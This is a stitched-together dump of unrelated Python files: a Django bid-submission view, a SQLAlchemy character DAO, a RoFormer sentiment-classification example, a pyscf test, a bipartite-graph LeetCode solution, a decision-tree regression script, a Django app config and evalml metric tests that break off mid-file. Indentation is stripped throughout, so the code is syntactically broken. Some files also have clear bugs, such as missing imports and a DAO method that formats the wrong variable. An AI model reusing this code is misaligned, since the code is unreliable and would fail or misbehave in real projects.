from django.contrib import messages
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.shortcuts import (
get_object_or_404,
render,
)
from gbe.models import (
Conference,
UserMessage,
)
from gbe_logging import log_func
from gbe.functions import (
validate_profile,
)
from gbe.email.functions import notify_reviewers_on_bid_change
from gbetext import (
no_login_msg,
fee_instructions,
full_login_msg,
payment_needed_msg,
payment_details_error,
)
from gbe_utils.text import no_profile_msg
from gbe.ticketing_idd_interface import (
get_payment_details,
get_ticket_form,
fee_paid,
)
class MakeBidView(View):
form = None
has_draft = True
instructions = ''
payment_form = None
coordinated = False
def groundwork(self, request, args, kwargs):
self.owner = validate_profile(request, require=False)
if not self.owner or not self.owner.complete:
user_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="PROFILE_INCOMPLETE",
defaults={
'summary': "Profile Incomplete",
'description': no_profile_msg})
messages.warning(request, user_message[0].description)
return '%s?next=%s' % (
reverse('profile_update', urlconf='gbe.urls'),
reverse('%s_create' % self.bid_type.lower(),
urlconf='gbe.urls'))
self.bid_object = None
if "bid_id" in kwargs:
bid_id = kwargs.get("bid_id")
self.bid_object = get_object_or_404(self.bid_class, pk=bid_id)
self.conference = self.bid_object.b_conference
else:
self.conference = Conference.objects.filter(
accepting_bids=True).first()
def make_post_forms(self, request, the_form):
if self.bid_object:
self.form = the_form(
request.POST,
instance=self.bid_object,
initial=self.get_initial(),
prefix=self.prefix)
else:
self.form = the_form(
request.POST,
initial=self.get_initial(),
prefix=self.prefix)
self.set_up_form()
def set_up_post(self, request):
the_form = None
if 'submit' in list(request.POST.keys()) or not self.has_draft:
the_form = self.submit_form
user_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="SUBMIT_SUCCESS",
defaults={
'summary': "%s Submit Success" % self.bid_type,
'description': self.submit_msg})
else:
the_form = self.draft_form
user_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="DRAFT_SUCCESS",
defaults={
'summary': "%s Save Draft Success" % self.bid_type,
'description': self.draft_msg})
self.make_post_forms(request, the_form)
return user_message
def make_context(self, request):
paid = fee_paid(
self.bid_type,
self.owner.user_object.username,
self.conference)
instructions = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="BID_INSTRUCTIONS",
defaults={
'summary': "%s Bid Instructions" % self.bid_type,
'description': self.instructions})
context = {
'conference': self.conference,
'forms': [self.form],
'page_title': self.page_title,
'view_title': self.view_title,
'draft_fields': self.draft_fields,
'submit_fields': self.submit_fields,
'fee_paid': paid,
'view_header_text': instructions[0].description,
}
if not paid and not self.coordinated:
user_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="FEE_MESSAGE",
defaults={
'summary': "%s Pre-submit Message" % self.bid_type,
'description': fee_instructions})
messages.info(
request,
user_message[0].description)
if self.payment_form:
context['forms'] += [self.payment_form]
else:
context['forms'] += [get_ticket_form(self.bid_class.__name__,
self.conference)]
return context
def get_create_form(self, request):
if self.bid_object:
self.form = self.submit_form(
prefix=self.prefix,
instance=self.bid_object,
initial=self.get_initial())
else:
self.form = self.submit_form(
prefix=self.prefix,
initial=self.get_initial())
self.set_up_form()
return render(
request,
'gbe/bid.tmpl',
self.make_context(request)
)
def check_validity(self, request):
return self.form.is_valid()
def set_up_form(self):
pass
def get_invalid_response(self, request):
self.set_up_form()
context = self.make_context(request)
return render(
request,
'gbe/bid.tmpl',
context)
def submit_bid(self, request):
self.bid_object.submitted = True
self.bid_object.save()
notify_reviewers_on_bid_change(
self.owner,
self.bid_object,
self.bid_type,
"Submission",
self.conference,
'%s Reviewers' % self.bid_type,
reverse('%s_review' % self.bid_type.lower(),
urlconf='gbe.urls'))
@never_cache
@log_func
def get(self, request, *args, **kwargs):
if not request.user.is_authenticated:
follow_on = '?next=%s' % reverse(
'%s_create' % self.bid_type.lower(),
urlconf='gbe.urls')
user_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="USER_NOT_LOGGED_IN",
defaults={
'summary': "Need Login - %s Bid",
'description': no_login_msg})
full_msg = full_login_msg % (
user_message[0].description,
reverse('login', urlconf='gbe.urls') + follow_on)
messages.warning(request, full_msg)
return HttpResponseRedirect(
reverse('register', urlconf='gbe.urls') + follow_on)
redirect = self.groundwork(request, args, kwargs)
if redirect:
return HttpResponseRedirect(redirect)
return self.get_create_form(request)
@never_cache
@log_func
@method_decorator(login_required)
def post(self, request, *args, **kwargs):
cart_items = []
paypal_button = None
total = None
redirect = None
redirect = self.groundwork(request, args, kwargs)
if redirect:
return HttpResponseRedirect(redirect)
user_message = self.set_up_post(request)
# check bid validity
if not self.check_validity(request):
return self.get_invalid_response(request)
if not self.coordinated and not fee_paid(
self.bid_type,
self.owner.user_object.username,
self.conference) and "draft" not in list(request.POST.keys()):
self.payment_form = get_ticket_form(self.bid_class.__name__,
self.conference,
request.POST)
if not self.payment_form.is_valid():
error_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="PAYMENT_CHOICE_INVALID",
defaults={
'summary': "User Made Invalid Ticket Choice",
'description': payment_details_error})
messages.error(request, error_message[0].description)
return self.get_invalid_response(request)
# save bid
if not self.bid_object:
self.bid_object = self.form.save(commit=False)
self.set_valid_form(request)
# if this isn't a draft, move forward through process, setting up
# payment review if payment is needed
if "submit" in list(request.POST.keys()):
if self.payment_form:
cart_items, paypal_button, total = get_payment_details(
request,
self.payment_form,
self.bid_type,
self.bid_object.pk,
self.owner.user_object.pk)
dynamic_message = UserMessage.objects.get_or_create(
view=self.__class__.__name__,
code="NOT_PAID_INSTRUCTIONS",
defaults={
'summary': "%s Not Paid" % self.bid_type,
'description': payment_needed_msg})
page_title = '%s Payment' % self.bid_type
return render(
request,
'gbe/confirm_pay.tmpl',
{'dynamic_message': dynamic_message[0].description,
'page_title': page_title,
'cart_items': cart_items,
'total': total,
'paypal_button': paypal_button})
else:
redirect = self.submit_bid(request)
messages.success(request, user_message[0].description)
return HttpResponseRedirect(
redirect or reverse('home', urlconf='gbe.urls'))
def dispatch(self, *args, **kwargs):
return super(MakeBidView, self).dispatch(*args, **kwargs)
| 1.90625 | 2 |
epicteller/core/dao/character.py | KawashiroNitori/epicteller | 0 | 7835 | <reponame>KawashiroNitori/epicteller<filename>epicteller/core/dao/character.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from collections import defaultdict
from typing import List, Optional, Iterable, Dict
import base62
from sqlalchemy import select, and_
from sqlalchemy.dialects.mysql import insert as mysql_insert
from epicteller.core.model.character import Character
from epicteller.core.tables import table
from epicteller.core.util import ObjectDict
from epicteller.core.util.enum import ExternalType
from epicteller.core.util.seq import get_id
def _format_character(result) -> Optional[Character]:
if not result:
return
character = Character(
id=result.id,
url_token=result.url_token,
member_id=result.member_id,
name=result.name,
avatar=result.avatar,
description=result.description,
is_removed=bool(result.is_removed),
raw_data=result.data,
created=result.created,
updated=result.updated,
)
return character
class CharacterDAO:
t = table.character
select_clause = select([
t.c.id,
t.c.url_token,
t.c.name,
t.c.member_id,
t.c.avatar,
t.c.description,
t.c.is_removed,
t.c.data,
t.c.created,
t.c.updated,
])
@classmethod
async def batch_get_character_by_id(cls, character_ids: Iterable[int]) -> Dict[int, Character]:
query = cls.select_clause.where(cls.t.c.id.in_(character_ids))
result = await table.execute(query)
rows = await result.fetchall()
return {row.id: _format_character(row) for row in rows}
@classmethod
async def batch_get_character_by_url_token(cls, url_tokens: Iterable[str]) -> Dict[str, Character]:
query = cls.select_clause.where(cls.t.c.url_token.in_(url_tokens))
result = await table.execute(query)
rows = await result.fetchall()
return {row.url_token: _format_character(result) for row in rows}
@classmethod
async def get_characters_by_owner(cls, member_id: int) -> List[Character]:
query = cls.select_clause.where(cls.t.c.member_id == member_id)
results = await table.execute(query)
characters = [_format_character(room) for room in await results.fetchall()]
return characters
@classmethod
async def update_character(cls, character_id: int, **kwargs) -> None:
if 'updated' not in kwargs:
kwargs['updated'] = int(time.time())
query = cls.t.update().values(kwargs).where(cls.t.c.id == character_id)
await table.execute(query)
@classmethod
async def create_character(cls, member_id: int, name: str, avatar: str, description: str,
raw_data: dict) -> Character:
created = int(time.time())
url_token = base62.encode(get_id())
values = ObjectDict(
url_token=url_token,
member_id=member_id,
name=name,
avatar=avatar,
description=description,
is_removed=0,
data=raw_data,
created=created,
updated=created,
)
query = cls.t.insert().values(values)
result = await table.execute(query)
values.id = result.lastrowid
character = _format_character(values)
return character
class CharacterCampaignDAO:
t = table.character_campaign_index
@classmethod
async def get_character_id_by_campaign_name(cls, campaign_id: int, name: str) -> Optional[int]:
query = select([cls.t.c.character_id]).where(and_(cls.t.c.campaign_id == campaign_id,
cls.t.c.name == name))
result = await table.execute(query)
row = await result.fetchone()
if not row:
return
return int(row.character_id)
@classmethod
async def get_character_ids_by_campaign_id(cls, campaign_id: int) -> List[int]:
query = select([cls.t.c.character_id]).where(cls.t.c.campaign_id == campaign_id)
results = await table.execute(query)
character_ids = [int(row.character_id) for row in await results.fetchall()]
return character_ids
@classmethod
async def get_campaign_ids_by_character_ids(cls, character_ids: List[int]) -> Dict[int, List[int]]:
query = select([
cls.t.c.character_id,
cls.t.c.campaign_id,
]).where(cls.t.c.character_id.in_(character_ids))
results = await table.execute(query)
rows = await results.fetchall()
campaign_map = defaultdict(list)
for r in rows:
campaign_map[r.character_id].append(r.campaign_id)
return dict(campaign_map)
@classmethod
async def bind_character_to_campaign(cls, character_id: int, name: str, campaign_id: int):
query = mysql_insert(cls.t).values(
character_id=character_id,
name=name,
campaign_id=campaign_id,
).on_duplicate_key_update(
name=name,
)
await table.execute(query)
@classmethod
async def unbind_character_to_campaign(cls, character_id: int, campaign_id: int):
query = cls.t.delete().where(and_(cls.t.c.character_id == character_id, cls.t.c.campaign_id == campaign_id))
await table.execute(query)
class CharacterExternalDAO:
t = table.character_external_id
@classmethod
async def get_external_ids_by_character(cls, character_id: int) -> Dict[ExternalType, str]:
query = select([
cls.t.c.type,
cls.t.c.external_id,
]).where(cls.t.c.character_id == character_id)
result = await table.execute(query)
rows = await result.fetchall()
externals = {ExternalType(row.type): row.external_id for row in rows}
return externals
@classmethod
async def get_character_ids_by_external(cls, external_type: ExternalType, external_id: str) -> List[int]:
query = select([cls.t.c.character_id]).where(and_(cls.t.c.type == int(external_type),
cls.t.c.external_id == external_id))
result = await table.execute(query)
rows = await result.fetchall()
character_ids = [r.character_id for r in rows]
return character_ids
@classmethod
async def bind_character_external_id(cls, character_id: int, external_type: ExternalType, external_id: str):
query = mysql_insert(cls.t).values(
character_id=character_id,
type=int(external_type),
external_id=external_id,
).on_duplicate_key_update(
external_id=external_id,
)
await table.execute(query)
@classmethod
async def unbind_character_external_id(cls, character_id: int, external_type: ExternalType):
query = cls.t.delete().where(and_(cls.t.c.character_id == character_id, cls.t.c.type == int(external_type)))
await table.execute(query)
| 2.140625 | 2 |
examples/sentence_classfication/task_sentiment_classification_roformer_v2.py | Tongjilibo/bert4torch | 49 | 7836 | <gh_stars>10-100
#! -*- coding:utf-8 -*-
# 情感分类例子,RoPE相对位置编码
# 官方项目:https://github.com/ZhuiyiTechnology/roformer-v2
# pytorch参考项目:https://github.com/JunnYu/RoFormer_pytorch
from bert4torch.tokenizers import Tokenizer
from bert4torch.models import build_transformer_model, BaseModel
from bert4torch.snippets import sequence_padding, Callback, text_segmentate, ListDataset
import torch.nn as nn
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
maxlen = 128
batch_size = 16
config_path = 'F:/Projects/pretrain_ckpt/roformer/[sushen_torch_base]--roformer_v2_char_base/config.json'
checkpoint_path = 'F:/Projects/pretrain_ckpt/roformer/[sushen_torch_base]--roformer_v2_char_base/pytorch_model.bin'
dict_path = 'F:/Projects/pretrain_ckpt/roformer/[sushen_torch_base]--roformer_v2_char_base/vocab.txt'
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# 建立分词器
tokenizer = Tokenizer(dict_path, do_lower_case=True)
# 加载数据集
class MyDataset(ListDataset):
@staticmethod
def load_data(filenames):
"""加载数据,并尽量划分为不超过maxlen的句子
"""
D = []
seps, strips = u'\n。!?!?;;,, ', u';;,, '
for filename in filenames:
with open(filename, encoding='utf-8') as f:
for l in f:
text, label = l.strip().split('\t')
for t in text_segmentate(text, maxlen - 2, seps, strips):
D.append((t, int(label)))
return D
def collate_fn(batch):
batch_token_ids, batch_segment_ids, batch_labels = [], [], []
for text, label in batch:
token_ids, segment_ids = tokenizer.encode(text, maxlen=maxlen)
batch_token_ids.append(token_ids)
batch_segment_ids.append(segment_ids)
batch_labels.append([label])
batch_token_ids = torch.tensor(sequence_padding(batch_token_ids), dtype=torch.long, device=device)
batch_segment_ids = torch.tensor(sequence_padding(batch_segment_ids), dtype=torch.long, device=device)
batch_labels = torch.tensor(batch_labels, dtype=torch.long, device=device)
return [batch_token_ids, batch_segment_ids], batch_labels.flatten()
# 加载数据集
train_dataloader = DataLoader(MyDataset(['E:/Github/bert4torch/examples/datasets/sentiment/sentiment.train.data']), batch_size=batch_size, shuffle=True, collate_fn=collate_fn)
valid_dataloader = DataLoader(MyDataset(['E:/Github/bert4torch/examples/datasets/sentiment/sentiment.valid.data']), batch_size=batch_size, collate_fn=collate_fn)
test_dataloader = DataLoader(MyDataset(['E:/Github/bert4torch/examples/datasets/sentiment/sentiment.test.data']), batch_size=batch_size, collate_fn=collate_fn)
# 定义bert上的模型结构
class Model(BaseModel):
def __init__(self) -> None:
super().__init__()
# 指定好model和对应的ckpt地址
self.bert, self.config = build_transformer_model(config_path=config_path, checkpoint_path=checkpoint_path, model='roformer_v2', return_model_config=True)
self.dropout = nn.Dropout(0.1)
self.dense = nn.Linear(self.config['hidden_size'], 2)
def forward(self, token_ids, segment_ids):
last_hidden_state = self.bert([token_ids, segment_ids])
output = self.dropout(last_hidden_state[:, 0, :])
output = self.dense(output)
return output
model = Model().to(device)
# 定义使用的loss和optimizer,这里支持自定义
model.compile(
loss=nn.CrossEntropyLoss(),
optimizer=optim.Adam(model.parameters(), lr=2e-5), # 用足够小的学习率
metrics=['accuracy']
)
# 定义评价函数
def evaluate(data):
total, right = 0., 0.
for x_true, y_true in data:
y_pred = model.predict(x_true).argmax(axis=1)
total += len(y_true)
right += (y_true == y_pred).sum().item()
return right / total
class Evaluator(Callback):
"""评估与保存
"""
def __init__(self):
self.best_val_acc = 0.
def on_epoch_end(self, global_step, epoch, logs=None):
val_acc = evaluate(valid_dataloader)
if val_acc > self.best_val_acc:
self.best_val_acc = val_acc
# model.save_weights('best_model.pt')
print(f'val_acc: {val_acc:.5f}, best_val_acc: {self.best_val_acc:.5f}\n')
if __name__ == '__main__':
evaluator = Evaluator()
model.fit(train_dataloader, epochs=20, steps_per_epoch=500, callbacks=[evaluator])
else:
model.load_weights('best_model.pt')
| 2.453125 | 2 |
pyscf/nao/test/test_0037_aos.py | fdmalone/pyscf | 1 | 7837 | # Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division
import os,unittest,numpy as np
class KnowValues(unittest.TestCase):
def test_aos_libnao(self):
""" Computing of the atomic orbitals """
from pyscf.nao import system_vars_c
from pyscf.tools.cubegen import Cube
sv = system_vars_c().init_siesta_xml(label='water', cd=os.path.dirname(os.path.abspath(__file__)))
cc = Cube(sv, nx=20, ny=20, nz=20)
aos = sv.comp_aos_den(cc.get_coords())
self.assertEqual(aos.shape[0], cc.nx*cc.ny*cc.nz)
self.assertEqual(aos.shape[1], sv.norbs)
if __name__ == "__main__": unittest.main()
| 1.984375 | 2 |
code_week12_713_719/is_graph_bipartite_hard.py | dylanlee101/leetcode | 0 | 7838 | '''
给定一个无向图graph,当这个图为二分图时返回true。
如果我们能将一个图的节点集合分割成两个独立的子集A和B,并使图中的每一条边的两个节点一个来自A集合,一个来自B集合,我们就将这个图称为二分图。
graph将会以邻接表方式给出,graph[i]表示图中与节点i相连的所有节点。每个节点都是一个在0到graph.length-1之间的整数。这图中没有自环和平行边: graph[i] 中不存在i,并且graph[i]中没有重复的值。
示例 1:
输入: [[1,3], [0,2], [1,3], [0,2]]
输出: true
解释:
无向图如下:
0----1
| |
| |
3----2
我们可以将节点分成两组: {0, 2} 和 {1, 3}。
示例 2:
输入: [[1,2,3], [0,2], [0,1,3], [0,2]]
输出: false
解释:
无向图如下:
0----1
| \ |
| \ |
3----2
我们不能将节点分割成两个独立的子集。
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/is-graph-bipartite
'''
class Solution:
def isBipartite(self, graph: List[List[int]]) -> bool:
n = len(graph)
uncolored, red, green = 0, 1, 2
color = [uncolored] * n
valid = True
def dfs(node, c):
nonlocal valid
color[node] = c
cNei = (green if c == red else red)
for neighbor in graph[node]:
if color[neighbor] == uncolored:
dfs(neighbor, cNei)
if not valid:
return
elif color[neighbor] != cNei:
valid = False
return
for i in range(n):
if color[i] == uncolored:
dfs(i, red)
if not valid:
break
return valid
| 3.90625 | 4 |
data_preprocessing/decision_tree_regression.py | Frost199/Machine_Learning | 0 | 7839 | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 17 06:44:47 2018
@author: <NAME>
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.tree import DecisionTreeRegressor
# importing the dataset
dataset = pd.read_csv('Position_Salaries.csv')
# take all the columns but leave the last one(-1)
# always make sure our independent variable is a matrix not a vector and
# dependent variable can be a vector
X = dataset.iloc[:, 1:-1].values
Y = dataset.iloc[:, 2].values
# splitting the dataset into a training set and a test set
# x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)
# feature scaling
"""sc_X = StandardScaler()
x_train = sc_X.fit_transform(x_train)
x_test = sc_X.transform(x_test)
sc_Y = StandardScaler()
x_train = sc_X.fit_transform(x_train)"""
# fitting the Decision Tree regression Model to the dataset
regressor = DecisionTreeRegressor(random_state=0)
regressor.fit(X, Y)
# predicting a new result
y_pred = regressor.predict(6.5)
# Visualizing the Decision tree regression result (for higher resolution and smoother curve)
X_grid = np.arange(min(X), max(X), 0.01)
X_grid = X_grid.reshape(len(X_grid), 1)
plt.scatter(X, Y, color='red')
plt.plot(X_grid, regressor.predict(X_grid), color='blue')
plt.title("Truth or Bluff (Regression Model)")
plt.xlabel("Position Level")
plt.ylabel("Salary")
plt.show() | 3.265625 | 3 |
user_messages/apps.py | everaccountable/django-user-messages | 0 | 7840 | <filename>user_messages/apps.py
from django.apps import AppConfig
from django.conf import settings
from django.core import checks
from django.template import engines
from django.template.backends.django import DjangoTemplates
from django.utils.text import capfirst
from django.utils.translation import gettext_lazy as _
@checks.register()
def check_context_processors(app_configs, **kwargs):
errors = []
for engine in engines.all():
if isinstance(engine, DjangoTemplates):
django_templates_instance = engine.engine
break
else:
django_templates_instance = None
if django_templates_instance:
if (
"django.contrib.messages.context_processors.messages"
not in django_templates_instance.context_processors
and "admin.E404" not in settings.SILENCED_SYSTEM_CHECKS
):
errors.append(
checks.Error(
"If using 'user_messages.context_processors.messages'"
" instead of the official messages context processor"
" you have to add 'admin.E404' to SILENCED_SYSTEM_CHECKS.",
id="user_messages.E001",
)
)
if ("admin.E406" not in settings.SILENCED_SYSTEM_CHECKS and
"django.contrib.messages" not in settings.INSTALLED_APPS):
errors.append(
checks.Error(
"If using 'user_messages' instead of django.contrib.messages"
" you have to add 'admin.E406' to SILENCED_SYSTEM_CHECKS.",
id="user_messages.E002",
)
)
return errors
class UserMessagesConfig(AppConfig):
default_auto_field = "django.db.models.AutoField"
name = "user_messages"
verbose_name = capfirst(_("user messages"))
| 1.976563 | 2 |
evalml/tests/objective_tests/test_standard_metrics.py | sharshofski/evalml | 0 | 7841 | from itertools import product
import numpy as np
import pandas as pd
import pytest
from sklearn.metrics import matthews_corrcoef as sk_matthews_corrcoef
from evalml.objectives import (
F1,
MAPE,
MSE,
AccuracyBinary,
AccuracyMulticlass,
BalancedAccuracyBinary,
BalancedAccuracyMulticlass,
BinaryClassificationObjective,
CostBenefitMatrix,
ExpVariance,
F1Macro,
F1Micro,
F1Weighted,
LogLossBinary,
MCCBinary,
MCCMulticlass,
MeanSquaredLogError,
Precision,
PrecisionMacro,
PrecisionMicro,
PrecisionWeighted,
Recall,
RecallMacro,
RecallMicro,
RecallWeighted,
RootMeanSquaredError,
RootMeanSquaredLogError
)
from evalml.objectives.utils import (
_all_objectives_dict,
get_non_core_objectives
)
EPS = 1e-5
all_automl_objectives = _all_objectives_dict()
all_automl_objectives = {name: class_() for name, class_ in all_automl_objectives.items() if class_ not in get_non_core_objectives()}
def test_input_contains_nan():
y_predicted = np.array([np.nan, 0, 0])
y_true = np.array([1, 2, 1])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"):
objective.score(y_true, y_predicted)
y_true = np.array([np.nan, 0, 0])
y_predicted = np.array([1, 2, 0])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="y_true contains NaN or infinity"):
objective.score(y_true, y_predicted)
y_true = np.array([1, 0])
y_predicted_proba = np.array([[1, np.nan], [0.1, 0]])
for objective in all_automl_objectives.values():
if objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"):
objective.score(y_true, y_predicted_proba)
def test_input_contains_inf():
y_predicted = np.array([np.inf, 0, 0])
y_true = np.array([1, 0, 0])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"):
objective.score(y_true, y_predicted)
y_true = np.array([np.inf, 0, 0])
y_predicted = np.array([1, 0, 0])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="y_true contains NaN or infinity"):
objective.score(y_true, y_predicted)
y_true = np.array([1, 0])
y_predicted_proba = np.array([[1, np.inf], [0.1, 0]])
for objective in all_automl_objectives.values():
if objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"):
objective.score(y_true, y_predicted_proba)
def test_different_input_lengths():
y_predicted = np.array([0, 0])
y_true = np.array([1])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="Inputs have mismatched dimensions"):
objective.score(y_true, y_predicted)
y_true = np.array([0, 0])
y_predicted = np.array([1, 2, 0])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="Inputs have mismatched dimensions"):
objective.score(y_true, y_predicted)
def test_zero_input_lengths():
y_predicted = np.array([])
y_true = np.array([])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="Length of inputs is 0"):
objective.score(y_true, y_predicted)
def test_probabilities_not_in_0_1_range():
y_predicted = np.array([0.3, 1.001, 0.3])
y_true = np.array([1, 0, 1])
for objective in all_automl_objectives.values():
if objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains probability estimates"):
objective.score(y_true, y_predicted)
y_predicted = np.array([0.3, -0.001, 0.3])
y_true = np.array([1, 0, 1])
for objective in all_automl_objectives.values():
if objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains probability estimates"):
objective.score(y_true, y_predicted)
y_true = np.array([1, 0])
y_predicted_proba = np.array([[1, 3], [0.1, 0]])
for objective in all_automl_objectives.values():
if objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains probability estimates"):
objective.score(y_true, y_predicted_proba)
def test_negative_with_log():
y_predicted = np.array([-1, 10, 30])
y_true = np.array([-1, 0, 1])
for objective in [MeanSquaredLogError(), RootMeanSquaredLogError()]:
with pytest.raises(ValueError, match="Mean Squared Logarithmic Error cannot be used when targets contain negative values."):
objective.score(y_true, y_predicted)
def test_binary_more_than_two_unique_values():
y_predicted = np.array([0, 1, 2])
y_true = np.array([1, 0, 1])
for objective in all_automl_objectives.values():
if isinstance(objective, BinaryClassificationObjective) and not objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains more than two unique values"):
objective.score(y_true, y_predicted)
y_true = np.array([0, 1, 2])
y_predicted = np.array([1, 0, 1])
for objective in all_automl_objectives.values():
if isinstance(objective, BinaryClassificationObjective) and not objective.score_needs_proba:
with pytest.raises(ValueError, match="y_true contains more than two unique values"):
objective.score(y_true, y_predicted)
def test_accuracy_binary():
obj = AccuracyBinary()
assert obj.score(np.array([0, 0, 1, 1]),
np.array([1, 1, 0, 0])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0, 1, 1]),
np.array([0, 1, 0, 1])) == pytest.approx(0.5, EPS)
assert obj.score(np.array([0, 0, 1, 1]),
np.array([0, 0, 1, 1])) == pytest.approx(1.0, EPS)
def test_accuracy_multi():
obj = AccuracyMulticlass()
assert obj.score(np.array([0, 0, 1, 1]),
np.array([1, 1, 0, 0])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0, 1, 1]),
np.array([0, 1, 0, 1])) == pytest.approx(0.5, EPS)
assert obj.score(np.array([0, 0, 1, 1]),
np.array([0, 0, 1, 1])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 1, 1, 2, 2]),
np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 0, 0, 0]),
np.array([0, 0, 1, 1, 2, 2])) == pytest.approx(1 / 3.0, EPS)
def test_balanced_accuracy_binary():
obj = BalancedAccuracyBinary()
assert obj.score(np.array([0, 1, 0, 0, 1, 0]),
np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.625, EPS)
assert obj.score(np.array([0, 1, 0, 0, 1, 0]),
np.array([0, 1, 0, 0, 1, 0])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 1, 0, 0, 1, 0]),
np.array([1, 0, 1, 1, 0, 1])) == pytest.approx(0.0, EPS)
def test_balanced_accuracy_multi():
obj = BalancedAccuracyMulticlass()
assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]),
np.array([0, 0, 2, 0, 0, 2, 3])) == pytest.approx(0.75, EPS)
assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]),
np.array([0, 1, 2, 0, 1, 2, 3])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]),
np.array([1, 0, 3, 1, 2, 1, 0])) == pytest.approx(0.0, EPS)
def test_f1_binary():
obj = F1()
assert obj.score(np.array([0, 1, 0, 0, 1, 0]),
np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.5, EPS)
assert obj.score(np.array([0, 1, 0, 0, 1, 1]),
np.array([0, 1, 0, 0, 1, 1])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 0, 1, 0]),
np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([0, 0])) == pytest.approx(0.0, EPS)
def test_f1_micro_multi():
obj = F1Micro()
assert obj.score(np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([1, 2]),
np.array([0, 0])) == pytest.approx(0.0, EPS)
def test_f1_macro_multi():
obj = F1Macro()
assert obj.score(np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) \
== pytest.approx(2 * (1 / 3.0) * (1 / 9.0) / (1 / 3.0 + 1 / 9.0), EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([1, 2]),
np.array([0, 0])) == pytest.approx(0.0, EPS)
def test_f1_weighted_multi():
obj = F1Weighted()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) \
== pytest.approx(2 * (1 / 3.0) * (1 / 9.0) / (1 / 3.0 + 1 / 9.0), EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_precision_binary():
obj = Precision()
assert obj.score(np.array([1, 1, 1, 1, 1, 1]),
np.array([0, 0, 0, 1, 1, 1])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1]),
np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(0.5, EPS)
assert obj.score(np.array([0, 0, 0, 0, 0, 0]),
np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0, 0, 0, 0, 0]),
np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(0.0, EPS)
def test_precision_micro_multi():
obj = PrecisionMicro()
